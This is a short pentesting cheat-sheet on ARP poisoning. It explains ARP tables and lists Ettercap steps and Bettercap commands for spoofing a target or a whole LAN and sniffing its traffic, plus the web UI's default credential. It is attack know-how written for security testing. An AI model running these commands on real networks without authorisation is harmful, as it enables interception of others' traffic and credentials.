# ARP Poisoning

IP addresses are used in communication between networks (layer 3, routers).\
MAC addresses are used in communication within a local network (layer 2, switches).\
The **ARP table** is used to maintain a correspondence between IP addresses and MAC addresses within a local network, which is necessary for routing packets. ARP tables are updated every time an ARP response is received, even if no request has been sent to them.\
ARP table poisoning attacks aim to manipulate victims' ARP tables by sending spoofed packets, such as packets with modified MAC addresses, to insert false MAC-IP associations.

## [Ettercap](https://github.com/Ettercap/ettercap)

GUI.

* Scan hosts.
* Select targets (or even just one) and add them to the scope.
* Start one-way ARP poisoning or sniff.

## [Bettercap](https://www.bettercap.org/)

Command-line.

{% code overflow="wrap" %}

```bash
sudo bettercap
```

{% endcode %}

{% code overflow="wrap" %}

```bash
set arp.spoof.internal true
# spoof also internal network communications, not just external
```

{% endcode %}

{% code overflow="wrap" %}

```bash
set arp.spoof.targets <IP>
# without IP spoofs the whole network
```

{% endcode %}

{% code overflow="wrap" %}

```bash
arp.spoof on/off
```

{% endcode %}

{% code overflow="wrap" %}

```bash
net.sniff on/off
# sniffing of target connections
```

{% endcode %}

GUI.

{% code overflow="wrap" %}

```bash
sudo bettercap -eval "caplets.update; ui.update; q"
```

{% endcode %}

{% code overflow="wrap" %}

```bash
sudo bettercap -caplet http-ui 
```

{% endcode %}

Default credential: `user:pass`\
Change in `/usr/share/bettercap/caplets/http-ui.cap`